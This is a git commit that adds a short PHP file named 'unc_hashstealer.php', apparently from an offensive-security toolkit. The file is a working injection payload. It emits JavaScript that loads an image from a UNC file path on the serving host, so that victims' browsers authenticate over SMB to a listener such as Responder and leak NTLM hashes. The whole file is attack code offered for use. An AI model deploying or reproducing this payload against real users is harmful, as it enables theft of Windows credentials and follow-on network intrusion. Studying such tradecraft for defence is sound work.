Added UNC hash stealer

This commit is contained in:
Strawp 2016-08-02 16:53:04 +01:00
parent 0e5e27f0b4
commit 298e52fccd
2 changed files with 8 additions and 0 deletions

8
unc_hashstealer.php Executable file
View file

@ -0,0 +1,8 @@
<?php
/**
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
*/
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
echo "// $url\n";
?>
new Image().src="<?php echo $url; ?>";